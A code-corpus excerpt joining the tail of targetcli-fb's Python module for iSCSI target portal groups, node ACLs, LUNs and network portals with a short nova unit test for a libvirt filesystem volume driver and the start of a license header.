@param current_param: Name of parameter to complete.
@type current_param: str
@return: Possible completions
@rtype: list of str
'''
if current_param == 'tag':
tags = [child.name[3:] for child in self.children]
completions = [tag for tag in tags if tag.startswith(text)]
else:
completions = []
if len(completions) == 1:
return [completions[0] + ' ']
else:
return completions
class UITPG(UIRTSLibNode):
ui_desc_attributes = {
'authentication': ('number', 'If set to 1, enforce authentication for this TPG.'),
'cache_dynamic_acls': ('number', 'If set to 1 in demo mode, cache dynamically generated ACLs.'),
'default_cmdsn_depth': ('number', 'Default CmdSN (Command Sequence Number) depth.'),
'default_erl': ('number', 'Default Error Recovery Level.'),
'demo_mode_discovery': ('number', 'If set to 1 in demo mode, enable discovery.'),
'demo_mode_write_protect': ('number', 'If set to 1 in demo mode, prevent writes to LUNs.'),
'fabric_prot_type': ('number', 'Fabric DIF protection type.'),
'generate_node_acls': ('number', 'If set to 1, allow all initiators to login (i.e. demo mode).'),
'login_timeout': ('number', 'Login timeout value in seconds.'),
'netif_timeout': ('number', 'NIC failure timeout in seconds.'),
'prod_mode_write_protect': ('number', 'If set to 1, prevent writes to LUNs.'),
't10_pi': ('number', 'If set to 1, enable T10 Protection Information.'),
'tpg_enabled_sendtargets': ('number', 'If set to 1, the SendTargets discovery response advertises the TPG only if the TPG is enabled.'),
}
ui_desc_parameters = {
'AuthMethod': ('string', 'Authentication method used by the TPG.'),
'DataDigest': ('string', 'If set to CRC32C, the integrity of the PDU data part is verified.'),
'DataPDUInOrder': ('yesno', 'If set to Yes, the data PDUs within sequences must be in order.'),
'DataSequenceInOrder': ('yesno', 'If set to Yes, the data sequences must be in order.'),
'DefaultTime2Retain': ('number', 'Maximum time, in seconds, after an initial wait, before which an active task reassignment is still possible after an unexpected connection termination or a connection reset.'),
'DefaultTime2Wait': ('number', 'Minimum time, in seconds, to wait before attempting an explicit/implicit logout or an active task reassignment after an unexpected connection termination or a connection reset.'),
'ErrorRecoveryLevel': ('number', 'Recovery levels represent a combination of recovery capabilities.'),
'FirstBurstLength': ('number', 'Maximum amount in bytes of unsolicited data an initiator may send.'),
'HeaderDigest': ('string', 'If set to CRC32C, the integrity of the PDU header part is verified.'),
'IFMarker': ('yesno', 'Deprecated according to RFC 7143.'),
'IFMarkInt': ('string', 'Deprecated according to RFC 7143.'),
'ImmediateData': ('string', 'Immediate data support.'),
'InitialR2T': ('yesno', 'If set to No, the default use of R2T (Ready To Transfer) is disabled.'),
'MaxBurstLength': ('number', 'Maximum SCSI data payload in bytes in a Data-In or a solicited Data-Out iSCSI sequence.'),
'MaxConnections': ('number', 'Maximum number of connections acceptable.'),
'MaxOutstandingR2T': ('number', 'Maximum number of outstanding R2Ts per task.'),
'MaxRecvDataSegmentLength': ('number', 'Maximum data segment length in bytes the target can receive in an iSCSI PDU.'),
'MaxXmitDataSegmentLength': ('number', 'Outgoing MaxRecvDataSegmentLength sent over the wire during iSCSI login response.'),
'OFMarker': ('yesno', 'Deprecated according to RFC 7143.'),
'OFMarkInt': ('string', 'Deprecated according to RFC 7143.'),
'TargetAlias': ('string', 'Human-readable target name or description.'),
}
'''
A generic TPG UI.
'''
def __init__(self, tpg, parent):
name = "tpg%d" % tpg.tag
super(UITPG, self).__init__(name, tpg, parent)
self.refresh()
UILUNs(tpg, self)
if tpg.has_feature('acls'):
UINodeACLs(self.rtsnode, self)
if tpg.has_feature('nps'):
UIPortals(self.rtsnode, self)
if self.rtsnode.has_feature('auth') \
and os.path.exists(self.rtsnode.path + "/auth"):
for param in auth_params:
self.define_config_group_param('auth', param, 'string')
def summary(self):
tpg = self.rtsnode
status = None
msg = []
if tpg.has_feature('nexus'):
msg.append(str(self.rtsnode.nexus))
if not tpg.enable:
return ("disabled", False)
if tpg.has_feature("acls"):
if "generate_node_acls" in tpg.list_attributes() and \
int(tpg.get_attribute("generate_node_acls")):
msg.append("gen-acls")
else:
msg.append("no-gen-acls")
# 'auth' feature requires 'acls'
if tpg.has_feature("auth"):
if not int(tpg.get_attribute("authentication")):
msg.append("no-auth")
if int(tpg.get_attribute("generate_node_acls")):
# if auth=0, g_n_a=1 is recommended
status = True
else:
if not int(tpg.get_attribute("generate_node_acls")):
msg.append("auth per-acl")
else:
msg.append("tpg-auth")
status = True
if not (tpg.chap_password and tpg.chap_userid):
status = False
if tpg.authenticate_target:
msg.append("mutual auth")
else:
msg.append("1-way auth")
return (", ".join(msg), status)
def ui_getgroup_auth(self, auth_attr):
return getattr(self.rtsnode, "chap_" + auth_attr)
def ui_setgroup_auth(self, auth_attr, value):
self.assert_root()
if value is None:
value = ''
setattr(self.rtsnode, "chap_" + auth_attr, value)
def ui_command_enable(self):
'''
Enables the TPG.
SEE ALSO
========
B{disable status}
'''
self.assert_root()
if self.rtsnode.enable:
self.shell.log.info("The TPGT is already enabled.")
else:
try:
self.rtsnode.enable = True
self.shell.log.info("The TPGT has been enabled.")
except RTSLibError:
raise ExecutionError("The TPGT could not be enabled.")
def ui_command_disable(self):
'''
Disables the TPG.
SEE ALSO
========
B{enable status}
'''
self.assert_root()
if self.rtsnode.enable:
self.rtsnode.enable = False
self.shell.log.info("The TPGT has been disabled.")
else:
self.shell.log.info("The TPGT is already disabled.")
class UITarget(UITPG):
'''
A generic target UI merged with its only TPG.
'''
def __init__(self, target, parent):
super(UITarget, self).__init__(TPG(target, 1), parent)
self._name = target.wwn
self.target = target
if self.parent.name != "sbp":
self.rtsnode.enable = True
def summary(self):
try:
self.target.fabric_module.to_normalized_wwn(self.target.wwn)
except:
return ("INVALID WWN", False)
return super(UITarget, self).summary()
class UINodeACLs(UINode):
'''
A generic UI for node ACLs.
'''
def __init__(self, tpg, parent):
super(UINodeACLs, self).__init__("acls", parent)
self.tpg = tpg
self.refresh()
def refresh(self):
self._children = set([])
for name in self.all_names():
UINodeACL(name, self)
def summary(self):
return ("ACLs: %d" % len(self._children), None)
def ui_command_create(self, wwn, add_mapped_luns=None):
'''
Creates a Node ACL for the initiator node with the specified I{wwn}.
The node's I{wwn} must match the expected WWN Type of the target's
fabric module.
If I{add_mapped_luns} is omitted, the global parameter
B{auto_add_mapped_luns} will be used, else B{true} or B{false} are
accepted. If B{true}, then after creating the ACL, mapped LUNs will be
automatically created for all existing LUNs.
SEE ALSO
========
B{delete}
'''
self.assert_root()
add_mapped_luns = self.ui_eval_param(add_mapped_luns, 'bool',
self.shell.prefs['auto_add_mapped_luns'])
node_acl = NodeACL(self.tpg, wwn, mode="create")
ui_node_acl = UINodeACL(node_acl.node_wwn, self)
self.shell.log.info("Created Node ACL for %s" % node_acl.node_wwn)
if add_mapped_luns:
for lun in self.tpg.luns:
MappedLUN(node_acl, lun.lun, lun.lun, write_protect=False)
self.shell.log.info("Created mapped LUN %d." % lun.lun)
self.refresh()
return self.new_node(ui_node_acl)
def ui_command_delete(self, wwn):
'''
Deletes the Node ACL with the specified I{wwn}.
SEE ALSO
========
B{create}
'''
self.assert_root()
node_acl = NodeACL(self.tpg, wwn, mode='lookup')
node_acl.delete()
self.shell.log.info("Deleted Node ACL %s." % wwn)
self.refresh()
def ui_complete_delete(self, parameters, text, current_param):
'''
Parameter auto-completion method for user command delete.
@param parameters: Parameters on the command line.
@type parameters: dict
@param text: Current text of parameter being typed by the user.
@type text: str
@param current_param: Name of parameter to complete.
@type current_param: str
@return: Possible completions
@rtype: list of str
'''
if current_param == 'wwn':
wwns = [acl.node_wwn for acl in self.tpg.node_acls]
completions = [wwn for wwn in wwns if wwn.startswith(text)]
else:
completions = []
if len(completions) == 1:
return [completions[0] + ' ']
else:
return completions
def find_tagged(self, name):
for na in self.tpg.node_acls:
if na.node_wwn == name:
yield na
elif na.tag == name:
yield na
def all_names(self):
names = set([])
for na in self.tpg.node_acls:
if na.tag:
names.add(na.tag)
else:
names.add(na.node_wwn)
return names
def ui_command_tag(self, wwn_or_tag, new_tag):
'''
Tag a NodeACL.
Usage: tag <wwn_or_tag> <new_tag>
Tags help manage initiator WWNs. A tag can apply to one or
more WWNs. This can give a more meaningful name to a single
initiator's configuration, or allow multiple initiators with
identical settings to be configured en masse.
The WWNs described by <wwn_or_tag> will be given the new
tag. If new_tag already exists, its new members will adopt the
current tag's configuration.
Within a tag, the 'info' command shows the WWNs the tag applies to.
Use 'untag' to remove tags.
NOTE: tags are only supported in kernel 3.8 and above.
'''
if wwn_or_tag == new_tag:
return
# Since all WWNs have a '.' in them, let's avoid confusion.
if '.' in new_tag:
raise ExecutionError("'.' not permitted in tag names.")
src = list(self.find_tagged(wwn_or_tag))
if not src:
raise ExecutionError("wwn_or_tag %s not found." % wwn_or_tag)
old_tag_members = list(self.find_tagged(new_tag))
# handle overlap
src_wwns = [na.node_wwn for na in src]
old_tag_members = [old for old in old_tag_members if old.node_wwn not in src_wwns]
for na in src:
na.tag = new_tag
# if joining a tag, take its config
if old_tag_members:
model = old_tag_members[0]
for mlun in na.mapped_luns:
mlun.delete()
for mlun in model.mapped_luns:
MappedLUN(na, mlun.mapped_lun, mlun.tpg_lun, mlun.write_protect)
if self.parent.rtsnode.has_feature("auth"):
for param in auth_params:
setattr(na, "chap_" + param, getattr(model, "chap_" + param))
for item in model.list_attributes(writable=True):
na.set_attribute(item, model.get_attribute(item))
for item in model.list_parameters(writable=True):
na.set_parameter(item, model.get_parameter(item))
self.refresh()
def ui_command_untag(self, wwn_or_tag):
'''
Untag a NodeACL.
Usage: untag <tag>
Remove the tag given to one or more initiator WWNs. They will
return to being displayed by WWN in the configuration tree, and
will maintain settings from when they were tagged.
'''
for na in list(self.find_tagged(wwn_or_tag)):
na.tag = None
self.refresh()
def ui_complete_tag(self, parameters, text, current_param):
'''
Parameter auto-completion method for user command tag
@param parameters: Parameters on the command line.
@type parameters: dict
@param text: Current text of parameter being typed by the user.
@type text: str
@param current_param: Name of parameter to complete.
@type current_param: str
@return: Possible completions
@rtype: list of str
'''
if current_param == 'wwn_or_tag':
completions = [n for n in self.all_names() if n.startswith(text)]
else:
completions = []
if len(completions) == 1:
return [completions[0] + ' ']
else:
return completions
ui_complete_untag = ui_complete_tag
class UINodeACL(UIRTSLibNode):
'''
A generic UI for a node ACL.
Handles grouping multiple NodeACLs in UI via tags.
All gets are performed against first NodeACL.
All sets are performed on all NodeACLs.
This is to make management of multiple ACLs easier.
'''
ui_desc_attributes = {
'dataout_timeout': ('number', 'Data-Out timeout in seconds before invoking recovery.'),
'dataout_timeout_retries': ('number', 'Number of Data-Out timeout recovery attempts before failing a path.'),
'default_erl': ('number', 'Default Error Recovery Level.'),
'nopin_response_timeout': ('number', 'Nop-In response timeout in seconds.'),
'nopin_timeout': ('number', 'Nop-In timeout in seconds.'),
'random_datain_pdu_offsets': ('number', 'If set to 1, request random Data-In PDU offsets.'),
'random_datain_seq_offsets': ('number', 'If set to 1, request random Data-In sequence offsets.'),
'random_r2t_offsets': ('number', 'If set to 1, request random R2T (Ready To Transfer) offsets.'),
}
ui_desc_parameters = UITPG.ui_desc_parameters
def __init__(self, name, parent):
# Don't want to duplicate work in UIRTSLibNode, so call it but
# del self.rtsnode to make sure we always use self.rtsnodes.
self.rtsnodes = list(parent.find_tagged(name))
super(UINodeACL, self).__init__(name, self.rtsnodes[0], parent)
del self.rtsnode
if self.parent.parent.rtsnode.has_feature('auth'):
for parameter in auth_params:
self.define_config_group_param('auth', parameter, 'string')
self.refresh()
def ui_getgroup_auth(self, auth_attr):
'''
This is the backend method for getting auths attributes.
@param auth_attr: The auth attribute to get the value of.
@type auth_attr: str
@return: The auth attribute's value
@rtype: str
'''
# All should return same, so just return from the first one
return getattr(self.rtsnodes[0], "chap_" + auth_attr)
def ui_setgroup_auth(self, auth_attr, value):
'''
This is the backend method for setting auths attributes.
@param auth_attr: The auth attribute to set the value of.
@type auth_attr: str
@param value: The auth's value
@type value: str
'''
self.assert_root()
if value is None:
value = ''
for na in self.rtsnodes:
setattr(na, "chap_" + auth_attr, value)
def refresh(self):
self._children = set([])
for mlun in self.rtsnodes[0].mapped_luns:
UIMappedLUN(mlun, self)
def summary(self):
msg = []
if self.name != self.rtsnodes[0].node_wwn:
if len(self.rtsnodes) > 1:
msg.append("(group of %d)" % len(self.rtsnodes))
else:
msg.append("(%s)" % self.rtsnodes[0].node_wwn)
status = None
na = self.rtsnodes[0]
tpg = self.parent.parent.rtsnode
if tpg.has_feature("auth") and \
int(tpg.get_attribute("authentication")):
if int(tpg.get_attribute("generate_node_acls")):
msg.append("auth via tpg")
else:
status = True
if not (na.chap_password and na.chap_userid):
status = False
if na.authenticate_target:
msg.append("mutual auth")
else:
msg.append("1-way auth")
msg.append("Mapped LUNs: %d" % len(self._children))
return (", ".join(msg), status)
def ui_command_create(self, mapped_lun, tpg_lun_or_backstore, write_protect=None):
'''
Creates a mapping to one of the TPG LUNs for the initiator referenced
by the ACL. The provided I{tpg_lun_or_backstore} will appear to that
initiator as LUN I{mapped_lun}. If the I{write_protect} flag is set to
B{1}, the initiator will not have write access to the Mapped LUN.
A storage object may also be given for the I{tpg_lun_or_backstore} parameter,
in which case the TPG LUN will be created for that backstore before
mapping the LUN to the initiator. If a TPG LUN for the backstore already
exists, the Mapped LUN will map to that TPG LUN.
Finally, a path to an existing block device or file can be given. If so,
a storage object of the appropriate type is created with default parameters,
followed by the TPG LUN and the Mapped LUN.
SEE ALSO
========
B{delete}
'''
self.assert_root()
try:
mapped_lun = int(mapped_lun)
except ValueError:
raise ExecutionError("mapped_lun must be an integer")
try:
if tpg_lun_or_backstore.startswith("lun"):
tpg_lun_or_backstore = tpg_lun_or_backstore[3:]
tpg_lun = int(tpg_lun_or_backstore)
except ValueError:
try:
so = self.get_node(tpg_lun_or_backstore).rtsnode
except ValueError:
try:
so = StorageObjectFactory(tpg_lun_or_backstore)
self.shell.log.info("Created storage object %s." % so.name)
except RTSLibError:
raise ExecutionError("LUN, storage object, or path not valid")
self.get_node("/backstores").refresh()
ui_tpg = self.parent.parent
for lun in ui_tpg.rtsnode.luns:
if so == lun.storage_object:
tpg_lun = lun.lun
break
else:
lun_object = LUN(ui_tpg.rtsnode, storage_object=so)
self.shell.log.info("Created LUN %s." % lun_object.lun)
ui_lun = UILUN(lun_object, ui_tpg.get_node("luns"))
tpg_lun = ui_lun.rtsnode.lun
if tpg_lun in (ml.tpg_lun.lun for ml in self.rtsnodes[0].mapped_luns):
self.shell.log.warning(
"Warning: TPG LUN %d already mapped to this NodeACL" % tpg_lun)
for na in self.rtsnodes:
mlun = MappedLUN(na, mapped_lun, tpg_lun, write_protect)
ui_mlun = UIMappedLUN(mlun, self)
self.shell.log.info("Created Mapped LUN %s." % mlun.mapped_lun)
return self.new_node(ui_mlun)
def ui_complete_create(self, parameters, text, current_param):
'''
Parameter auto-completion method for user command create.
@param parameters: Parameters on the command line.
@type parameters: dict
@param text: Current text of parameter being typed by the user.
@type text: str
@param current_param: Name of parameter to complete.
@type current_param: str
@return: Possible completions
@rtype: list of str
'''
if current_param == 'tpg_lun_or_backstore':
completions = []
for backstore in self.get_node('/backstores').children:
for storage_object in backstore.children:
completions.append(storage_object.path)
completions.extend(lun.name for lun in self.parent.parent.get_node("luns").children)
completions.extend(complete_path(text, lambda x: stat.S_ISREG(x) or stat.S_ISBLK(x)))
completions = [c for c in completions if c.startswith(text)]
else:
completions = []
if len(completions) == 1:
return [completions[0] + ' ']
else:
return completions
def ui_command_delete(self, mapped_lun):
'''
Deletes the specified I{mapped_lun}.
SEE ALSO
========
B{create}
'''
self.assert_root()
for na in self.rtsnodes:
mlun = MappedLUN(na, mapped_lun)
mlun.delete()
self.shell.log.info("Deleted Mapped LUN %s." % mapped_lun)
self.refresh()
def ui_complete_delete(self, parameters, text, current_param):
'''
Parameter auto-completion method for user command delete.
@param parameters: Parameters on the command line.
@type parameters: dict
@param text: Current text of parameter being typed by the user.
@type text: str
@param current_param: Name of parameter to complete.
@type current_param: str
@return: Possible completions
@rtype: list of str
'''
if current_param == 'mapped_lun':
mluns = [str(mlun.mapped_lun) for mlun in self.rtsnodes[0].mapped_luns]
completions = [mlun for mlun in mluns if mlun.startswith(text)]
else:
completions = []
if len(completions) == 1:
return [completions[0] + ' ']
else:
return completions
# Override these four methods to handle multiple NodeACLs
def ui_getgroup_attribute(self, attribute):
return self.rtsnodes[0].get_attribute(attribute)
def ui_setgroup_attribute(self, attribute, value):
self.assert_root()
for na in self.rtsnodes:
na.set_attribute(attribute, value)
def ui_getgroup_parameter(self, parameter):
return self.rtsnodes[0].get_parameter(parameter)
def ui_setgroup_parameter(self, parameter, value):
self.assert_root()
for na in self.rtsnodes:
na.set_parameter(parameter, value)
def ui_command_info(self):
'''
Since we don't have a self.rtsnode we can't use the base implementation
of this method. We also want to not print node_wwn, but list *all*
wwns for this entry.
'''
info = self.rtsnodes[0].dump()
for item in ('attributes', 'parameters', "node_wwn"):
if item in info:
del info[item]
for name, value in sorted(six.iteritems(info)):
if not isinstance (value, (dict, list)):
self.shell.log.info("%s: %s" % (name, value))
self.shell.log.info("wwns:")
for na in self.parent.find_tagged(self.name):
self.shell.log.info(na.node_wwn)
class UIMappedLUN(UIRTSLibNode):
'''
A generic UI for MappedLUN objects.
'''
def __init__(self, mapped_lun, parent):
name = "mapped_lun%d" % mapped_lun.mapped_lun
super(UIMappedLUN, self).__init__(name, mapped_lun, parent)
self.refresh()
def summary(self):
mapped_lun = self.rtsnode
is_healthy = True
try:
tpg_lun = mapped_lun.tpg_lun
except RTSLibBrokenLink:
description = "BROKEN LUN LINK"
is_healthy = False
else:
if mapped_lun.write_protect:
access_mode = 'ro'
else:
access_mode = 'rw'
description = "lun%d %s/%s (%s)" \
% (tpg_lun.lun, tpg_lun.storage_object.plugin,
tpg_lun.storage_object.name, access_mode)
return (description, is_healthy)
class UILUNs(UINode):
'''
A generic UI for TPG LUNs.
'''
def __init__(self, tpg, parent):
super(UILUNs, self).__init__("luns", parent)
self.tpg = tpg
self.refresh()
def refresh(self):
self._children = set([])
for lun in self.tpg.luns:
UILUN(lun, self)
def summary(self):
return ("LUNs: %d" % len(self._children), None)
def ui_command_create(self, storage_object, lun=None,
add_mapped_luns=None):
'''
Creates a new LUN in the Target Portal Group, attached to a storage
object. If the I{lun} parameter is omitted, the first available LUN in
the TPG will be used. If present, it must be a number greater than 0.
Alternatively, the syntax I{lunX} where I{X} is a positive number is
also accepted.
The I{storage_object} may be the path of an existing storage object,
i.e. B{/backstore/pscsi0/mydisk} to reference the B{mydisk} storage
object of the virtual HBA B{pscsi0}. It also may be the path to an
existing block device or image file, in which case a storage object
will be created for it first, with default parameters.
If I{add_mapped_luns} is omitted, the global parameter
B{auto_add_mapped_luns} will be used, else B{true} or B{false} are
accepted. If B{true}, then after creating the LUN, mapped LUNs will be
automatically created for all existing node ACLs, mapping the new LUN.
SEE ALSO
========
B{delete}
'''
self.assert_root()
add_mapped_luns = \
self.ui_eval_param(add_mapped_luns, 'bool',
self.shell.prefs['auto_add_mapped_luns'])
try:
so = self.get_node(storage_object).rtsnode
except ValueError:
try:
so = StorageObjectFactory(storage_object)
self.shell.log.info("Created storage object %s." % so.name)
except RTSLibError:
raise ExecutionError("storage object or path not valid")
self.get_node("/backstores").refresh()
if so in (l.storage_object for l in self.parent.rtsnode.luns):
raise ExecutionError("lun for storage object %s/%s already exists" \
% (so.plugin, so.name))
if lun and lun.lower().startswith('lun'):
lun = lun[3:]
lun_object = LUN(self.tpg, lun, so)
self.shell.log.info("Created LUN %s." % lun_object.lun)
ui_lun = UILUN(lun_object, self)
if add_mapped_luns:
for acl in self.tpg.node_acls:
if lun:
mapped_lun = lun
else:
mapped_lun = 0
existing_mluns = [mlun.mapped_lun for mlun in acl.mapped_luns]
if mapped_lun in existing_mluns:
mapped_lun = None
for possible_mlun in six.moves.range(MappedLUN.MAX_LUN):
if possible_mlun not in existing_mluns:
mapped_lun = possible_mlun
break
if mapped_lun == None:
self.shell.log.warning(
"Cannot map new lun %s into ACL %s"
% (lun_object.lun, acl.node_wwn))
else:
mlun = MappedLUN(acl, mapped_lun, lun_object, write_protect=False)
self.shell.log.info("Created LUN %d->%d mapping in node ACL %s"
% (mlun.tpg_lun.lun, mlun.mapped_lun, acl.node_wwn))
self.parent.refresh()
return self.new_node(ui_lun)
def ui_complete_create(self, parameters, text, current_param):
'''
Parameter auto-completion method for user command create.
@param parameters: Parameters on the command line.
@type parameters: dict
@param text: Current text of parameter being typed by the user.
@type text: str
@param current_param: Name of parameter to complete.
@type current_param: str
@return: Possible completions
@rtype: list of str
'''
if current_param == 'storage_object':
storage_objects = []
for backstore in self.get_node('/backstores').children:
for storage_object in backstore.children:
storage_objects.append(storage_object.path)
completions = [so for so in storage_objects if so.startswith(text)]
completions.extend(complete_path(text, lambda x: stat.S_ISREG(x) or stat.S_ISBLK(x)))
else:
completions = []
if len(completions) == 1:
return [completions[0] + ' ']
else:
return completions
def ui_command_delete(self, lun):
'''
Deletes the supplied LUN from the Target Portal Group. The I{lun} must
be a positive number matching an existing LUN.
Alternatively, the syntax I{lunX} where I{X} is a positive number is
also accepted.
SEE ALSO
========
B{create}
'''
self.assert_root()
if lun.lower().startswith("lun"):
lun = lun[3:]
try:
lun_object = LUN(self.tpg, lun)
except:
raise RTSLibError("Invalid LUN")
lun_object.delete()
self.shell.log.info("Deleted LUN %s." % lun)
# Refresh the TPG as we need to also refresh acls MappedLUNs
self.parent.refresh()
def ui_complete_delete(self, parameters, text, current_param):
'''
Parameter auto-completion method for user command delete.
@param parameters: Parameters on the command line.
@type parameters: dict
@param text: Current text of parameter being typed by the user.
@type text: str
@param current_param: Name of parameter to complete.
@type current_param: str
@return: Possible completions
@rtype: list of str
'''
if current_param == 'lun':
luns = [str(lun.lun) for lun in self.tpg.luns]
completions = [lun for lun in luns if lun.startswith(text)]
else:
completions = []
if len(completions) == 1:
return [completions[0] + ' ']
else:
return completions
class UILUN(UIRTSLibNode):
'''
A generic UI for LUN objects.
'''
def __init__(self, lun, parent):
name = "lun%d" % lun.lun
super(UILUN, self).__init__(name, lun, parent)
self.refresh()
self.define_config_group_param("alua", "alua_tg_pt_gp_name", 'string')
def summary(self):
lun = self.rtsnode
is_healthy = True
try:
storage_object = lun.storage_object
except RTSLibBrokenLink:
description = "BROKEN STORAGE LINK"
is_healthy = False
else:
description = "%s/%s" % (storage_object.plugin, storage_object.name,)
if storage_object.udev_path:
description += " (%s)" % storage_object.udev_path
description += " (%s)" % lun.alua_tg_pt_gp_name
return (description, is_healthy)
def ui_getgroup_alua(self, alua_attr):
return getattr(self.rtsnode, alua_attr)
def ui_setgroup_alua(self, alua_attr, value):
self.assert_root()
if value is None:
return
setattr(self.rtsnode, alua_attr, value)
class UIPortals(UINode):
'''
A generic UI for TPG network portals.
'''
def __init__(self, tpg, parent):
super(UIPortals, self).__init__("portals", parent)
self.tpg = tpg
self.refresh()
def refresh(self):
self._children = set([])
for portal in self.tpg.network_portals:
UIPortal(portal, self)
def summary(self):
return ("Portals: %d" % len(self._children), None)
def _canonicalize_ip(self, ip_address):
"""
rtslib expects ipv4 addresses as a dotted-quad string, and IPv6
addresses surrounded by brackets.
"""
# Contains a '.'? Must be ipv4, right?
if "." in ip_address:
return ip_address
return "[" + ip_address + "]"
def ui_command_create(self, ip_address=None, ip_port=None):
'''
Creates a Network Portal with specified I{ip_address} and
I{ip_port}. If I{ip_port} is omitted, the default port for
the target fabric will be used. If I{ip_address} is omitted,
INADDR_ANY (0.0.0.0) will be used.
Choosing IN6ADDR_ANY (::0) will listen on all IPv6 interfaces
as well as IPv4, assuming IPV6_V6ONLY sockopt has not been
set.
Note: Portals on Link-local IPv6 addresses are currently not
supported.
SEE ALSO
========
B{delete}
'''
self.assert_root()
# FIXME: Add a specfile parameter to determine default port
ip_port = self.ui_eval_param(ip_port, 'number', 3260)
ip_address = self.ui_eval_param(ip_address, 'string', "0.0.0.0")
if ip_port == 3260:
self.shell.log.info("Using default IP port %d" % ip_port)
if ip_address == "0.0.0.0":
self.shell.log.info("Binding to INADDR_ANY (0.0.0.0)")
portal = NetworkPortal(self.tpg, self._canonicalize_ip(ip_address),
ip_port, mode='create')
self.shell.log.info("Created network portal %s:%d."
% (ip_address, ip_port))
ui_portal = UIPortal(portal, self)
return self.new_node(ui_portal)
def ui_complete_create(self, parameters, text, current_param):
'''
Parameter auto-completion method for user command create.
@param parameters: Parameters on the command line.
@type parameters: dict
@param text: Current text of parameter being typed by the user.
@type text: str
@param current_param: Name of parameter to complete.
@type current_param: str
@return: Possible completions
@rtype: list of str
'''
def list_eth_ips():
if not ethtool:
return []
devcfgs = ethtool.get_interfaces_info(ethtool.get_devices())
addrs = set()
for d in devcfgs:
if d.ipv4_address:
addrs.add(d.ipv4_address)
addrs.add("0.0.0.0")
for ip6 in d.get_ipv6_addresses():
addrs.add(ip6.address)
addrs.add("::0") # only list ::0 if ipv6 present
return sorted(addrs)
if current_param == 'ip_address':
completions = [addr for addr in list_eth_ips()
if addr.startswith(text)]
else:
completions = []
if len(completions) == 1:
return [completions[0] + ' ']
else:
return completions
def ui_command_delete(self, ip_address, ip_port):
'''
Deletes the Network Portal with specified I{ip_address} and I{ip_port}.
SEE ALSO
========
B{create}
'''
self.assert_root()
portal = NetworkPortal(self.tpg, self._canonicalize_ip(ip_address),
ip_port, mode='lookup')
portal.delete()
self.shell.log.info("Deleted network portal %s:%s"
% (ip_address, ip_port))
self.refresh()
def ui_complete_delete(self, parameters, text, current_param):
'''
Parameter auto-completion method for user command delete.
@param parameters: Parameters on the command line.
@type parameters: dict
@param text: Current text of parameter being typed by the user.
@type text: str
@param current_param: Name of parameter to complete.
@type current_param: str
@return: Possible completions
@rtype: list of str
'''
completions = []
# TODO: Check if a dict comprehension is acceptable here with supported
# XXX: python versions.
portals = {}
all_ports = set([])
for portal in self.tpg.network_portals:
all_ports.add(str(portal.port))
portal_ip = portal.ip_address.strip('[]')
if not portal_ip in portals:
portals[portal_ip] = []
portals[portal_ip].append(str(portal.port))
if current_param == 'ip_address':
completions = [addr for addr in portals if addr.startswith(text)]
if 'ip_port' in parameters:
port = parameters['ip_port']
completions = [addr for addr in completions
if port in portals[addr]]
elif current_param == 'ip_port':
if 'ip_address' in parameters:
addr = parameters['ip_address']
if addr in portals:
completions = [port for port in portals[addr]
if port.startswith(text)]
else:
completions = [port for port in all_ports
if port.startswith(text)]
if len(completions) == 1:
return [completions[0] + ' ']
else:
return completions
class UIPortal(UIRTSLibNode):
'''
A generic UI for a network portal.
'''
def __init__(self, portal, parent):
name = "%s:%s" % (portal.ip_address, portal.port)
super(UIPortal, self).__init__(name, portal, parent)
self.refresh()
def summary(self):
if self.rtsnode.iser:
return('iser', True)
elif self.rtsnode.offload:
return('offload', True)
return ('', True)
def ui_command_enable_iser(self, boolean):
'''
Enables or disables iSER for this NetworkPortal.
If iSER is not supported by the kernel, this command will do nothing.
'''
boolean = self.ui_eval_param(boolean, 'bool', False)
self.rtsnode.iser = boolean
self.shell.log.info("iSER enable now: %s" % self.rtsnode.iser)
def ui_command_enable_offload(self, boolean):
'''
Enables or disables offload for this NetworkPortal.
If offload is not supported by the kernel, this command will do nothing.
'''
boolean = self.ui_eval_param(boolean, 'bool', False)
self.rtsnode.offload = boolean
self.shell.log.info("offload enable now: %s" % self.rtsnode.offload)
| agrover/targetcli-fb | targetcli/ui_target.py | Python | apache-2.0 | 54,009 |
# Copyright 2015 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
import mock
from nova import test
from nova.tests.unit.virt.libvirt import fakelibvirt
from nova import utils
from nova.virt import fake
from nova.virt.libvirt import driver
from nova.virt.libvirt.volume import fs
FAKE_MOUNT_POINT = '/var/lib/nova/fake-mount'
FAKE_SHARE = 'fake-share'
NORMALIZED_SHARE = FAKE_SHARE + '-normalized'
HASHED_SHARE = utils.get_hash_str(NORMALIZED_SHARE)
FAKE_DEVICE_NAME = 'fake-device'
class FSVolumeDriverSubclassSignatureTestCase(test.SubclassSignatureTestCase):
def _get_base_class(self):
# We do this because it has the side-effect of loading all the
# volume drivers
self.useFixture(fakelibvirt.FakeLibvirtFixture())
driver.LibvirtDriver(fake.FakeVirtAPI(), False)
return fs.LibvirtBaseFileSystemVolumeDriver
class FakeFileSystemVolumeDriver(fs.LibvirtBaseFileSystemVolumeDriver):
def _get_mount_point_base(self):
return FAKE_MOUNT_POINT
def _normalize_export(self, export):
return NORMALIZED_SHARE
class LibvirtBaseFileSystemVolumeDriverTestCase(test.NoDBTestCase):
"""Tests the basic behavior of the LibvirtBaseFileSystemVolumeDriver"""
def setUp(self):
super(LibvirtBaseFileSystemVolumeDriverTestCase, self).setUp()
self.connection = mock.Mock()
self.driver = FakeFileSystemVolumeDriver(self.connection)
self.connection_info = {
'data': {
'export': FAKE_SHARE,
'name': FAKE_DEVICE_NAME,
}
}
def test_get_device_path(self):
path = self.driver._get_device_path(self.connection_info)
expected_path = os.path.join(FAKE_MOUNT_POINT,
HASHED_SHARE,
FAKE_DEVICE_NAME)
self.assertEqual(expected_path, path)
| rajalokan/nova | nova/tests/unit/virt/libvirt/volume/test_fs.py | Python | apache-2.0 | 2,437 |
# Copyright (c) 2013 Mirantis Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
